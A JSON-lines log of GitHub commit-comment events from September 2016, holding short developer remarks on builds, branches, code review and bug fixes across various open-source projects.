{"id":"4505705539","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872319,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-01T23:21:11Z","updated_at":"2016-09-01T23:21:11Z","body":"I can compile it with MSVC 2010, can you help me to fix this?"}},"created_at":"2016-09-01T23:21:11Z"}
{"id":"4505706085","type":"CommitCommentEvent","actor":{"login":"notronik"},"repo":{"name":"notronik/PygmentsKit"},"payload":{"comment":{"id":18872321,"position":null,"line":null,"path":null,"commit_id":"4838f914c86f435344a52b7820902b48a2902230","created_at":"2016-09-01T23:21:21Z","updated_at":"2016-09-01T23:21:21Z","body":"Welp, I guess Xcode already made an initial commit. Thanks Xcode…"}},"created_at":"2016-09-01T23:21:21Z"}
{"id":"4505708422","type":"CommitCommentEvent","actor":{"login":"mhdawson"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18872324,"position":null,"line":null,"path":null,"commit_id":"baa0ffdab37a490e8ca69c82772425f8bdec0ec2","created_at":"2016-09-01T23:22:06Z","updated_at":"2016-09-01T23:22:06Z","body":"Looking at the AIX runs I've seen a few failures of: parallel/test-cluster-dgram-1 \r\n\r\nI wonder if its related to this change ?"}},"created_at":"2016-09-01T23:22:06Z"}
{"id":"4505711389","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872333,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-01T23:23:00Z","updated_at":"2016-09-01T23:23:00Z","body":"I'll try to fix it here and I talk to you"}},"created_at":"2016-09-01T23:23:00Z"}
{"id":"4505711535","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872334,"position":1,"line":1,"path":"init-cli.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:23:03Z","updated_at":"2016-09-01T23:23:03Z","body":"Oh I haven't seen that, would it preclude the need for this script?"}},"created_at":"2016-09-01T23:23:03Z"}
{"id":"4505712571","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872339,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:23:22Z","updated_at":"2016-09-01T23:23:22Z","body":"let me give a shot...(while i am trying this,check the mention i will do with u )\r\n"}},"created_at":"2016-09-01T23:23:22Z"}
{"id":"4505712768","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872341,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:23:25Z","updated_at":"2016-09-01T23:23:25Z","body":"yeah the linker is somewhat broken atm. i'd rather not merge this since it is just a workaround for a broken shim implementation. i'd probably wait for crpalmer or someone else capable to fix the broken shim"}},"created_at":"2016-09-01T23:23:25Z"}
{"id":"4505713086","type":"CommitCommentEvent","actor":{"login":"rakeshr1"},"repo":{"name":"Stanford-Mobisocial-IoT-Lab/sempre"},"payload":{"comment":{"id":18872342,"position":null,"line":null,"path":null,"commit_id":"d2396c6ad524a9caac41e93fa82a8c487112642c","created_at":"2016-09-01T23:23:31Z","updated_at":"2016-09-01T23:23:31Z","body":"Is this meant to solve the \"tweet\" or \"snap\" etc where the word isnt part of the canonical phrase?"}},"created_at":"2016-09-01T23:23:31Z"}
{"id":"4505714519","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"JDCTeam/android_vendor_jdc"},"payload":{"comment":{"id":18872344,"position":null,"line":null,"path":null,"commit_id":"b15d2558c1ebb962a468538a95042d4906ceee2b","created_at":"2016-09-01T23:23:57Z","updated_at":"2016-09-01T23:23:57Z","body":"@B--B this.some aosp CDMA users also reported this"}},"created_at":"2016-09-01T23:23:57Z"}
{"id":"4505717568","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872348,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:24:53Z","updated_at":"2016-09-01T23:24:53Z","body":"i haven't really been working on cm 14 nowadays since i've been busting my ass off working the many bugs users have been complaining about in 6.0."}},"created_at":"2016-09-01T23:24:53Z"}
{"id":"4505718679","type":"CommitCommentEvent","actor":{"login":"vinpez"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18872350,"position":119,"line":185,"path":"app/pages/devices/add_edit_device.ts","commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T23:25:12Z","updated_at":"2016-09-01T23:25:12Z","body":"done"}},"created_at":"2016-09-01T23:25:12Z"}
{"id":"4505720822","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18872356,"position":6,"line":690,"path":"RX.h","commit_id":"6f22bf142d9c90a195fb316bbe54626c06f2f763","created_at":"2016-09-01T23:25:50Z","updated_at":"2016-09-01T23:25:50Z","body":"Good spot! I was wondering why SBUS never worked on the RX."}},"created_at":"2016-09-01T23:25:50Z"}
{"id":"4505723154","type":"CommitCommentEvent","actor":{"login":"vinpez"},"repo":{"name":"hanoiiot/hanoi"},"payload":{"comment":{"id":18872362,"position":null,"line":null,"path":null,"commit_id":"6228390c5d5485731cccef8cd32e1258704df764","created_at":"2016-09-01T23:26:31Z","updated_at":"2016-09-01T23:26:31Z","body":"Thanks, I need to leave the house. I think I'm going to take a beach day tomorrow, then get back to it."}},"created_at":"2016-09-01T23:26:31Z"}
{"id":"4505723278","type":"CommitCommentEvent","actor":{"login":"ritthikai"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":18872364,"position":null,"line":null,"path":null,"commit_id":"cc908d341433ea2345bc8de51b03653569b225c7","created_at":"2016-09-01T23:26:33Z","updated_at":"2016-09-01T23:26:33Z","body":"I can speak my language, Thailand. can you ?"}},"created_at":"2016-09-01T23:26:33Z"}
{"id":"4505730842","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872383,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:28:49Z","updated_at":"2016-09-01T23:28:49Z","body":"hmm, there may have been something that changed in the linker though, i'll have to get back up to speed with the cm 14 work soon."}},"created_at":"2016-09-01T23:28:49Z"}
{"id":"4505734340","type":"CommitCommentEvent","actor":{"login":"Sfshaza"},"repo":{"name":"dart-lang/site-www"},"payload":{"comment":{"id":18872391,"position":null,"line":null,"path":null,"commit_id":"dbe36286abbb0f520d3329dee84db893b02b02ec","created_at":"2016-09-01T23:29:53Z","updated_at":"2016-09-01T23:29:53Z","body":"Fixed bug:  https://github.com/dart-lang/site-www/issues/125"}},"created_at":"2016-09-01T23:29:53Z"}
{"id":"4505735247","type":"CommitCommentEvent","actor":{"login":"jbarlow83"},"repo":{"name":"jbarlow83/OCRmyPDF"},"payload":{"comment":{"id":18872393,"position":null,"line":null,"path":null,"commit_id":"325cc0beca8f268744779f5aa5e17061626e440f","created_at":"2016-09-01T23:30:09Z","updated_at":"2016-09-01T23:30:09Z","body":"I experimented and it seems that py.test is designed to take care of this automatically (provided a package has tests outside its package source tree, as with ocrmypdf). If running via `python3 setup.py test` (to test the package before installation) py.test inserts the uninstalled package into sys.path (I think by way of a temporary installation). If run as `py.test` it will take the system package because it changes PWD and runs each test in its directory.\r\n\r\nSo, with your patch applied, it did all work properly (no crossover of uninstalled/installed versions) before, but I now I understand why it works, which makes me feel a lot better about it. With your patch applied `python3 setup.py test` should work on Debian and other platforms as expected without patching."}},"created_at":"2016-09-01T23:30:09Z"}
{"id":"4505736803","type":"CommitCommentEvent","actor":{"login":"npgall"},"repo":{"name":"npgall/cqengine"},"payload":{"comment":{"id":18872395,"position":null,"line":null,"path":null,"commit_id":"f4fd2e6b2b829fc982c2307ea54f11ee3dc0ad43","created_at":"2016-09-01T23:30:34Z","updated_at":"2016-09-01T23:30:34Z","body":"I guess every option is hacky in some way then at the moment. Hopefully in JDK 9 this stuff will be easier!"}},"created_at":"2016-09-01T23:30:34Z"}
{"id":"4505739140","type":"CommitCommentEvent","actor":{"login":"fxn"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":18872400,"position":5,"line":11,"path":"activemodel/lib/active_model/type/helpers/numeric.rb","commit_id":"810dff7c9fa9b2a38eb1560ce0378d760529ee6b","created_at":"2016-09-01T23:31:17Z","updated_at":"2016-09-01T23:31:17Z","body":"It is forcing `end` to be aligned with the LHS, going to apply the workaround seen elsewhere."}},"created_at":"2016-09-01T23:31:17Z"}
{"id":"4505739663","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872401,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-01T23:31:29Z","updated_at":"2016-09-01T23:31:29Z","body":"Compare the original file with my below changes:\r\nhttp://paste.ubuntu.com/23122202/ (I dont know what I'm doing, I'm newbie in C++) 👍 "}},"created_at":"2016-09-01T23:31:29Z"}
{"id":"4505739855","type":"CommitCommentEvent","actor":{"login":"andre77"},"repo":{"name":"timmolter/XChange"},"payload":{"comment":{"id":18872402,"position":null,"line":null,"path":null,"commit_id":"fb08e6a3ea1112fac0c88d8306af1f201e2c7c3c","created_at":"2016-09-01T23:31:32Z","updated_at":"2016-09-01T23:31:32Z","body":"Hi Aleksey,\r\nnice work indeed!\r\ncould you please also adopt the implementation for the method\r\n`org.knowm.xchange.independentreserve.service.polling.IndependentReserveMarketDataService.getOrderBook(CurrencyPair, Object...)`\r\n\r\ncurrently it does not work for BTC_USD, since we need to \"map\" BTC to XBT\r\nindependentreserve API replies with 400 `{\"Message\":\"Invalid Primary Currency Code\"}`\r\nthanks in advance"}},"created_at":"2016-09-01T23:31:32Z"}
{"id":"4505742292","type":"CommitCommentEvent","actor":{"login":"TeffenEllis"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18872406,"position":20,"line":154,"path":"app/components/target-wrapper/target-wrapper.styl","commit_id":"ef692a285463a3f2db555b9be347ae062ceec7e2","created_at":"2016-09-01T23:32:19Z","updated_at":"2016-09-01T23:32:19Z","body":"Moves element next to siblings so they're scrollable container is not reduced, but instead padded."}},"created_at":"2016-09-01T23:32:19Z"}
{"id":"4505743365","type":"CommitCommentEvent","actor":{"login":"VolterPL"},"repo":{"name":"Matt07211/xcover3ltexx_custom_kernel"},"payload":{"comment":{"id":18872410,"position":null,"line":null,"path":null,"commit_id":"e2b33efe919b223acc3200f7cbbdd639da6e7301","created_at":"2016-09-01T23:32:39Z","updated_at":"2016-09-01T23:32:39Z","body":"Now we have something like this:\r\n\r\nif SOMETHING then seth the flag to false\r\n\r\nWhat if that SOMETHING doesn't happen?\r\nThere's another way around. Let's leave the flag here set to true and set the SEC_BUILD_OPTION_SELINUX_ENFORCE to false. I think that's the proper way."}},"created_at":"2016-09-01T23:32:39Z"}
{"id":"4505743524","type":"CommitCommentEvent","actor":{"login":"Phosphorus-M"},"repo":{"name":"Phosphorus-M/ezarena"},"payload":{"comment":{"id":18872411,"position":null,"line":null,"path":null,"commit_id":"69c62cbe04b4337fc17339472800b5b2c0377622","created_at":"2016-09-01T23:32:41Z","updated_at":"2016-09-01T23:32:41Z","body":"@vendethiel I don't know, this patch is to be displayed youtube videos from other domains\r\nhttps://gaming.youtube.com\r\nhttps://www.youtube.com\r\nhttps://m.youtube.com\r\nand the abbreviation of links:\r\nhttps://youtu.be\r\nMaybe i forgot to send me this patch, sorry..."}},"created_at":"2016-09-01T23:32:41Z"}
{"id":"4505746325","type":"CommitCommentEvent","actor":{"login":"TeffenEllis"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18872416,"position":16,"line":46,"path":"app/embed-box.styl","commit_id":"ef692a285463a3f2db555b9be347ae062ceec7e2","created_at":"2016-09-01T23:33:30Z","updated_at":"2016-09-01T23:33:30Z","body":"Prevents overscroll/bounce on body when modal is up."}},"created_at":"2016-09-01T23:33:30Z"}
{"id":"4505747469","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":18872418,"position":null,"line":null,"path":null,"commit_id":"162f14b229bd5aebd9c576135a6005036bf9de1d","created_at":"2016-09-01T23:33:50Z","updated_at":"2016-09-01T23:33:50Z","body":"I think this should be \"Inactive\" (adjective) for the wording on the tab."}},"created_at":"2016-09-01T23:33:50Z"}
{"id":"4505748864","type":"CommitCommentEvent","actor":{"login":"TeffenEllis"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18872425,"position":7,"line":16,"path":"app/embed-box.styl","commit_id":"ef692a285463a3f2db555b9be347ae062ceec7e2","created_at":"2016-09-01T23:34:16Z","updated_at":"2016-09-01T23:34:16Z","body":"This seems to be a common solution to much of Safari's viewport calculations."}},"created_at":"2016-09-01T23:34:16Z"}
{"id":"4505750014","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872427,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:34:38Z","updated_at":"2016-09-01T23:34:38Z","body":"@B--B \r\nlets say i want to merge my optcm13 build repo with the latest cm-14.0 branch of CM\r\n\r\nfirst of all i have already manually create a branch called 'opt-cm-14.0' to build repo of jdcteam github for future use...For now i use \r\n\r\n<default revision=\"refs/heads/staging/cm-14.0\"\r\n           remote=\"github\"\r\n           sync-c=\"true\"\r\n           sync-j=\"4\" />\r\n<project path=\"build\" name=\"CyanogenMod/android_build\" groups=\"pdk,tradefed\" > \r\n\r\nso whats next ?\r\ncd build\r\ngit branch opt-cm-14.0\r\ngit checkout -b opt-cm-14.0 cm-14.0 ?? i am comfused.never used this 'checkout -b ..' command"}},"created_at":"2016-09-01T23:34:38Z"}
{"id":"4505757205","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872445,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:36:47Z","updated_at":"2016-09-01T23:36:47Z","body":"@dkati the problem is the branches in cm 14 are not clearly defined currently. we're mostly currently using staging/cm-14.0 branches for the initial bring-up, but will start over from a new cm-14.0 branch once we get everything set up."}},"created_at":"2016-09-01T23:36:47Z"}
{"id":"4505759422","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872458,"position":8,"line":8,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:37:29Z","updated_at":"2016-09-01T23:37:29Z","body":"That could work but if we can find a reliable way to diff. I know he suggested using git diff but that kind of ties us a little to closely to the source control system for my liking, which is why I suggested just file exist checks. "}},"created_at":"2016-09-01T23:37:29Z"}
{"id":"4505759714","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872460,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:37:34Z","updated_at":"2016-09-01T23:37:34Z","body":"@zwliew hey mate :) yes but since we can at least build something,why not try it ? :) ..."}},"created_at":"2016-09-01T23:37:34Z"}
{"id":"4505760168","type":"CommitCommentEvent","actor":{"login":"PropGit"},"repo":{"name":"parallaxinc/Scribbler-3_Library"},"payload":{"comment":{"id":18872461,"position":4,"line":66,"path":"Block_Wrapper.spin","commit_id":"87058ecd70c8ce698265788372aef73f99333c51","created_at":"2016-09-01T23:37:44Z","updated_at":"2016-09-01T23:37:44Z","body":"True.  On this hardware, we know it will be 80 MHz, but it would be the way you suggested just as a matter of convention."}},"created_at":"2016-09-01T23:37:44Z"}
{"id":"4505760923","type":"CommitCommentEvent","actor":{"login":"THENEWGAMECREATOR"},"repo":{"name":"mozilla/BrowserQuest"},"payload":{"comment":{"id":18872464,"position":null,"line":null,"path":null,"commit_id":"af32d247cac3495ca430d0effbb88dd5f3250b2c","created_at":"2016-09-01T23:37:57Z","updated_at":"2016-09-01T23:37:57Z","body":"@Zodie, I have been trying to use it through the site but that's where it says I cannot connect to the server\r\nTHENEWGAMECREATOR (TNGC)"}},"created_at":"2016-09-01T23:37:57Z"}
{"id":"4505762206","type":"CommitCommentEvent","actor":{"login":"Phosphorus-M"},"repo":{"name":"Phosphorus-M/ezarena"},"payload":{"comment":{"id":18872469,"position":null,"line":null,"path":null,"commit_id":"6f8e46398f743a73dfceb3515a2d25c9835b99cc","created_at":"2016-09-01T23:38:23Z","updated_at":"2016-09-01T23:38:23Z","body":"yes, it is the player html5 of youtube, the current player"}},"created_at":"2016-09-01T23:38:23Z"}
{"id":"4505763617","type":"CommitCommentEvent","actor":{"login":"emanic"},"repo":{"name":"dcos/dcos-docs"},"payload":{"comment":{"id":18872476,"position":4,"line":99,"path":"1.8/overview/concepts.md","commit_id":"ab52c31c0430074806428272afb8c9bb0b76aed0","created_at":"2016-09-01T23:38:51Z","updated_at":"2016-09-01T23:38:51Z","body":"@joel-hamill I do not think that there are any superusers in the open source product."}},"created_at":"2016-09-01T23:38:51Z"}
{"id":"4505763910","type":"CommitCommentEvent","actor":{"login":"aschuhardt"},"repo":{"name":"aschuhardt/Pierogi"},"payload":{"comment":{"id":18872477,"position":null,"line":null,"path":null,"commit_id":"0721f9e005057486d3bc1c6217ef6379b005ad8d","created_at":"2016-09-01T23:38:56Z","updated_at":"2016-09-01T23:38:56Z","body":"changed Entity Types from an Enum to an IntEnum type so that it is possible to digest this property in the serializer/deserializer."}},"created_at":"2016-09-01T23:38:56Z"}
{"id":"4505766488","type":"CommitCommentEvent","actor":{"login":"aschuhardt"},"repo":{"name":"aschuhardt/Pierogi"},"payload":{"comment":{"id":18872484,"position":null,"line":null,"path":null,"commit_id":"0721f9e005057486d3bc1c6217ef6379b005ad8d","created_at":"2016-09-01T23:39:47Z","updated_at":"2016-09-01T23:39:47Z","body":"Renamed EntitityDAO.py to Entities.py in order to avoid confusion since the \"DAO\" is redundant (see: directory name)"}},"created_at":"2016-09-01T23:39:47Z"}
{"id":"4505773727","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872506,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:42:06Z","updated_at":"2016-09-01T23:42:06Z","body":"Yeah i don't like this solution so much too, it's just temporary until someone fixes it, maybe you can include it in N temp fixes commit? :) Now that RIL works we can use it as daily and start to work seriously on it!\r\nUh a couple of things:\r\n1 i'm using latest cm kernel for the ROM and my test so the kernel is the same for the moment\r\n2 GPS works, but i haven't took a look at logs yet\r\n\r\nPS: don' t bother so much about users... They are never happy! :P \r\n\r\n@dkati then you probably must sync the cm manifest with staging branches for the moment: https://github.com/CyanogenMod/android/tree/staging/cm-14.0 probably you will experience some compiling errors, but nothig relevant i think"}},"created_at":"2016-09-01T23:42:06Z"}
{"id":"4505775864","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18872518,"position":null,"line":null,"path":null,"commit_id":"65d0a9478dfcd6c503f78bdf91510e671ea0354f","created_at":"2016-09-01T23:42:44Z","updated_at":"2016-09-01T23:42:44Z","body":"what? on proc cast triggered spell on pet right?\r\nWhat I'm I missing here?"}},"created_at":"2016-09-01T23:42:44Z"}
{"id":"4505778454","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18872529,"position":1,"line":1,"path":"init-cli.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-01T23:43:28Z","updated_at":"2016-09-01T23:43:28Z","body":"I would assume so but I've not tried using it yet and I'm failing to find a pointer to it right now. I suggest chatting with one of the cli guys about it. "}},"created_at":"2016-09-01T23:43:28Z"}
{"id":"4505778876","type":"CommitCommentEvent","actor":{"login":"aschuhardt"},"repo":{"name":"aschuhardt/Pierogi"},"payload":{"comment":{"id":18872532,"position":null,"line":null,"path":null,"commit_id":"0721f9e005057486d3bc1c6217ef6379b005ad8d","created_at":"2016-09-01T23:43:36Z","updated_at":"2016-09-01T23:43:36Z","body":"Made the decision to have each implementation of Entity use its own configuration + persistence file.  This greatly simplifies data access for that DOM's DAO, by eliminating the need to have to pick the particular object's information out of a collective JSON as well as doing away with the possibility of different DOMs stepping on each others' data.  This also allows us to avoid potentially nasty race conditions if we were try try and parallelize access to different types of data."}},"created_at":"2016-09-01T23:43:36Z"}
{"id":"4505781322","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":18872535,"position":null,"line":null,"path":null,"commit_id":"9fb6b6929259dc433a4ed935f3eb7c924c659791","created_at":"2016-09-01T23:44:21Z","updated_at":"2016-09-01T23:44:21Z","body":"i use that manifest \r\nhttps://github.com/dkati/android/blob/opt-cm-14.0/default.xml\r\ndidnt merge the changes Steve did before 5-6 hours though...\r\n\r\nAll i need is a buildable solution.i dont care for sensors/ril now ..."}},"created_at":"2016-09-01T23:44:21Z"}
{"id":"4505783324","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18872539,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T23:44:57Z","updated_at":"2016-09-01T23:44:57Z","body":"iteration (kbenne) - Win64-Windows-7-VisualStudio-12: OK (2412 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.53%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T23:44:57Z"}
{"id":"4505784280","type":"CommitCommentEvent","actor":{"login":"gcampax"},"repo":{"name":"Stanford-Mobisocial-IoT-Lab/sempre"},"payload":{"comment":{"id":18872541,"position":null,"line":null,"path":null,"commit_id":"d2396c6ad524a9caac41e93fa82a8c487112642c","created_at":"2016-09-01T23:45:15Z","updated_at":"2016-09-01T23:45:15Z","body":"Nah it's just meant to avoid querying \"post on twitter\", \"post on\" and \"post\" because they all get the same result. It's a performance optimization."}},"created_at":"2016-09-01T23:45:15Z"}
{"id":"4505787399","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18872550,"position":17,"line":24,"path":"Lesson_7/classes/carrige/cargo_carrige.rb","commit_id":"eba740ea774e7f31b14578a4e8debf614fa82d9f","created_at":"2016-09-01T23:46:13Z","updated_at":"2016-09-01T23:46:13Z","body":"Вообще, `to_s` должен возвращать строку, а выводим мы уже её отдельно. Кроме того, если `puts` метод получает в качестве аргумента **не** строку, то он автоматически у аргумента вызовет метод `to_s`."}},"created_at":"2016-09-01T23:46:13Z"}
{"id":"4505795376","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"JDCTeam/android_vendor_jdc"},"payload":{"comment":{"id":18872561,"position":null,"line":null,"path":null,"commit_id":"b15d2558c1ebb962a468538a95042d4906ceee2b","created_at":"2016-09-01T23:48:35Z","updated_at":"2016-09-01T23:48:35Z","body":"I can merge this but will be a pain for testers and during official ROM updates (at least on AOSP).. If supersu updates are not installed in system the app will disappear after the ROM update and supersu cannot be used until user download  the app again from play store.."}},"created_at":"2016-09-01T23:48:35Z"}
{"id":"4505797666","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18872564,"position":6,"line":34,"path":"Lesson_7/classes/train/train.rb","commit_id":"eba740ea774e7f31b14578a4e8debf614fa82d9f","created_at":"2016-09-01T23:49:20Z","updated_at":"2016-09-01T23:49:20Z","body":"Лучше, но ещё лучше так:\r\n\r\n```ruby\r\ndef each_carriage(&block)\r\n  @carriages.each(&block)\r\nend\r\n```"}},"created_at":"2016-09-01T23:49:20Z"}
{"id":"4505799028","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"JDCTeam/android_vendor_jdc"},"payload":{"comment":{"id":18872568,"position":null,"line":null,"path":null,"commit_id":"b15d2558c1ebb962a468538a95042d4906ceee2b","created_at":"2016-09-01T23:49:47Z","updated_at":"2016-09-01T23:49:47Z","body":"Uh wait no, i misunderstood, it's safe to merge :-)"}},"created_at":"2016-09-01T23:49:47Z"}
{"id":"4505801334","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"JDCTeam/android_vendor_jdc"},"payload":{"comment":{"id":18872573,"position":null,"line":null,"path":null,"commit_id":"b15d2558c1ebb962a468538a95042d4906ceee2b","created_at":"2016-09-01T23:50:29Z","updated_at":"2016-09-01T23:50:29Z","body":"i was reading ur post twice to understand :D ...no problem :) i am glad at least i helped a bit"}},"created_at":"2016-09-01T23:50:29Z"}
{"id":"4505804344","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"JDCTeam/Ramdisk"},"payload":{"comment":{"id":18872574,"position":null,"line":null,"path":null,"commit_id":"5f4a5574de145ab03618d1e457e1276d64bf296b","created_at":"2016-09-01T23:51:10Z","updated_at":"2016-09-01T23:51:10Z","body":"@B--B also this mate"}},"created_at":"2016-09-01T23:51:10Z"}
{"id":"4505806379","type":"CommitCommentEvent","actor":{"login":"joel-hamill"},"repo":{"name":"dcos/dcos-docs"},"payload":{"comment":{"id":18872577,"position":null,"line":null,"path":null,"commit_id":"ab52c31c0430074806428272afb8c9bb0b76aed0","created_at":"2016-09-01T23:51:49Z","updated_at":"2016-09-01T23:51:49Z","body":"@emanic true. i'll need to rewrite this topic for enterprise. "}},"created_at":"2016-09-01T23:51:49Z"}
{"id":"4505807960","type":"CommitCommentEvent","actor":{"login":"mtalexo"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":18872580,"position":null,"line":null,"path":null,"commit_id":"cfe05dfda3ba79aa1bd3acce6b4e766eb7b9bc00","created_at":"2016-09-01T23:52:19Z","updated_at":"2016-09-01T23:52:19Z","body":"Thank you, these names read easier.\r\n\r\nRegarding \"nodeU()/nodeV()\", why are \"U\" and \"V\" used here (is there some graph theory precedent for these two letters, as opposed to e.g. \"A\" and \"B\")?\r\n\r\nAlso, regarding the \"ValueGraph\" name, the \"Value\" doesn't seem to be a common graph-theoretic term, was something like \"EdgeLabeledGraph\" considered (the parsimony of the single-word \"Value\" is definitely a plus here, but I was a bit surprised by the \"Value\" terminology)?"}},"created_at":"2016-09-01T23:52:19Z"}
{"id":"4505808261","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"expressjs/express"},"payload":{"comment":{"id":18872581,"position":48,"line":122,"path":"test/res.redirect.js","commit_id":"76eaa326ee8c4dda05568c6452286a16adb84c0b","created_at":"2016-09-01T23:52:27Z","updated_at":"2016-09-01T23:52:27Z","body":"nice"}},"created_at":"2016-09-01T23:52:27Z"}
{"id":"4505810083","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18872586,"position":null,"line":null,"path":null,"commit_id":"340b8e447e859d2d9f39230393a55745c045d848","created_at":"2016-09-01T23:53:05Z","updated_at":"2016-09-01T23:53:05Z","body":"Shouldn't the throughput be adjusted to say 200 games per device so it goes through the network quicker?  More 7-core machines can work on it."}},"created_at":"2016-09-01T23:53:05Z"}
{"id":"4505814635","type":"CommitCommentEvent","actor":{"login":"amura2406"},"repo":{"name":"amura2406/babe_user_ms"},"payload":{"comment":{"id":18872594,"position":null,"line":null,"path":null,"commit_id":"2cc060140a616c88fa5885d58e18e306f87a661c","created_at":"2016-09-01T23:54:35Z","updated_at":"2016-09-01T23:54:35Z","body":"__API Description file syntax error on line 1479__: base type 'onject' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-01T23:54:35Z"}
{"id":"4505820346","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18872601,"position":null,"line":null,"path":null,"commit_id":"211f991b869486903523dacd4c1a74e5189e9d28","created_at":"2016-09-01T23:56:28Z","updated_at":"2016-09-01T23:56:28Z","body":"Perhaps I could have tried to tune this..."}},"created_at":"2016-09-01T23:56:28Z"}
